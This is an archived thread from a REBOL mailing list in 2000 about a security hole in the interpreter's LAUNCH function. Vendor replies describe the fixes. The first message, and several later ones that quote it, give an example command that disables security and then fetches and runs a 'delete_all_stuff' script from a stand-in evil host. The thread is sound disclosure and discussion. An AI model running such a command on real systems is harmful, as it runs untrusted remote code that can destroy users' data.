Mailing List Archive: 49091 messages
  • Home
  • Script library
  • AltME Archive
  • Mailing list
  • Articles Index
  • Site search
 

[ALLY] Launch security?

 [1/8] from: fsievert:uos at: 21-Aug-2000 10:43


Hi! I think that launch is not a really good idea. What happens, when I say launch {-s --do "do http://www.very-evil-site.com/delete_all_stuff.r"} in my REB site. This would allow me to kick away all of the security, wouldn t it? I didn t test it, cause Linux/Lib6/Xper Version is not able to "launch", yet. But with Windows this should work, I think. Launch must copy security enviroment to the second process and should have arguments like "do". (Without the next, of course :) Command-line arguments are no good idea, because filenames are written platform specific here. USAGE: LAUNCH value DESCRIPTION: Launches a new REBOL interpreter process. LAUNCH is a native value. ARGUMENTS: value -- The command-line arguments (Type: any-string) Comments? Frank

 [2/8] from: petr:krenzelok:trz:cz at: 21-Aug-2000 11:15


[fsievert--uos--de] wrote:
> Hi! > > I think that launch is not a really good idea. What happens, when I say > > launch {-s --do "do http://www.very-evil-site.com/delete_all_stuff.r"}
and what even using windowless "-w" session :-) -pekr-

 [3/8] from: brian:hawley:bigfoot at: 21-Aug-2000 11:46


Frank ([fsievert--uos--de]) wrote:
>I think that launch is not a really good idea. What happens, when I say > > launch {-s --do "do http://www.very-evil-site.com/delete_all_stuff.r"} > >in my REB site. This would allow me to kick away all of the security, >wouldn't it?
Yes, it would. I wrote about this last Friday on the rebol list, message #304082: "A small security hole REBOL, and a huge one!". Take a look at that thread, it's interesting reading. In reply, Jeff at REBOL Tech wrote:
>Launch, at least in its present form, will not likely be in >the regular distribution. It went out in the windows view
<<quoted lines omitted: 3>>
>a module prevented from affecting the surrounding execution >environment.
Sounds like good news, doesn't it? Brian Hawley

 [4/8] from: jeff:rebol at: 16-Sep-2000 8:23


>>> Frank ([fsievert--uos--de]) wrote: >>> I think that launch is >>> not a really good idea. What happens, when I say >>> launch {-s --do "do http://www.very-evil-site.com/delete_all_stuff.r"}
Launch is being changed to improve its security in two important ways: 1. Launch only works from the test panel -- so launched scripts can not launch others. 2. Launched scripts *should* always start with default security running, regardless of other monkey business that people do with the launch string. That's the basic idea. We really want to be able to use launch so if you see cases where the above is not the case or you think you see other risks involved with launch please let us know! The current behavior of launch isn't likely the final behavior, but we need something like launch in the meantime until we add mult-tasking. So let's patch the holes and make it useful. -jeff

 [5/8] from: petr:krenzelok:trz:cz at: 16-Sep-2000 18:41


----- Original Message ----- From: <[jeff--rebol--com]> To: <[ally--rebol--com]> Sent: Saturday, September 16, 2000 5:23 PM Subject: [ALLY] Launch security? Re:(3)
> > >>> Frank ([fsievert--uos--de]) wrote: > >>> I think that launch is > >>> not a really good idea. What happens, when I say > >>> launch {-s --do "do
http://www.very-evil-site.com/delete_all_stuff.r"}
> Launch is being changed to improve its security in two > important ways: > > 1. Launch only works from the test panel -- so launched > scripts can not launch others.
Uh! What a limitation, just checked out. Are we forced to write usefull scripts using panel???
> 2. Launched scripts *should* always start with default > security running, regardless of other monkey business
<<quoted lines omitted: 7>>
> until we add mult-tasking. So let's patch the holes and > make it useful.
1) Haha :-))) So, all hackers, save current /View versions for later usage, till "dangerous" behavior is not removed :-) 2) Tasking? 8-) /me always wonder what are RT folks cooking behind the door .... -pekr-

 [6/8] from: allenk:powerup:au at: 17-Sep-2000 1:17


----- Original Message ----- From: <[brian--hawley--bigfoot--com]> To: <[ally--rebol--com]> Sent: Tuesday, August 22, 2000 2:46 AM Subject: [ALLY] Launch security? Re:
> Frank ([fsievert--uos--de]) wrote: > >I think that launch is not a really good idea. What happens, when I say > > > > launch {-s --do "do
http://www.very-evil-site.com/delete_all_stuff.r"}
> > > >in my REB site. This would allow me to kick away all of the security,
<<quoted lines omitted: 6>>
> >the regular distribution. It went out in the windows view > >version by accident.
Not sure if anything has changed to make launch safer or not, but 'launch looks like it is meant to be part of \view now, or at least Carl is making use of it in the View Test Panel at the moment. Cheers, Allen K

 [7/8] from: allenk:powerup:au at: 17-Sep-2000 3:23


----- Original Message ----- From: <[jeff--rebol--com]> To: <[ally--rebol--com]> Sent: Sunday, September 17, 2000 1:23 AM Subject: [ALLY] Launch security? Re:(3)
> > >>> Frank ([fsievert--uos--de]) wrote: > >>> I think that launch is > >>> not a really good idea. What happens, when I say > >>> launch {-s --do "do
http://www.very-evil-site.com/delete_all_stuff.r"}
> Launch is being changed to improve its security in two > important ways:
<<quoted lines omitted: 3>>
> security running, regardless of other monkey business > that people do with the launch string.
Hi Jeff, I think if the second item is implemented then we may not not need the first. Being able to launch is good, if for no other reason than to keep sessions from global contamination. Apart from 'do, 'script and quiet, are any of the others needed for launch? Maybe 'no-window would be good for spawning a server, but I wonder what dangers allowing the launching of 'no-window scripts could hold?
> That's the basic idea. We really want to be able to use > launch so if you see cases where the above is not the case
<<quoted lines omitted: 5>>
> make it useful. > -jeff
Multi-tasking too, the future is looking bright. Cheers, Allen K Apologies to the world for Human Nature singing the our national anthem at the Olympics games. Those responsible have been sacked :-) Our new team of Llamas are doing a much better job.

 [8/8] from: carl:rebol at: 18-Sep-2000 17:44


>From Jeff: > Launch is being changed to improve its security in two
<<quoted lines omitted: 4>>
> security running, regardless of other monkey business > that people do with the launch string.
1 & 2 ARE implemented in the current release... but, sounds like they need more testing. -Carl

Notes
  • Quoted lines have been omitted from some messages.
    View the message alone to see the lines that have been omitted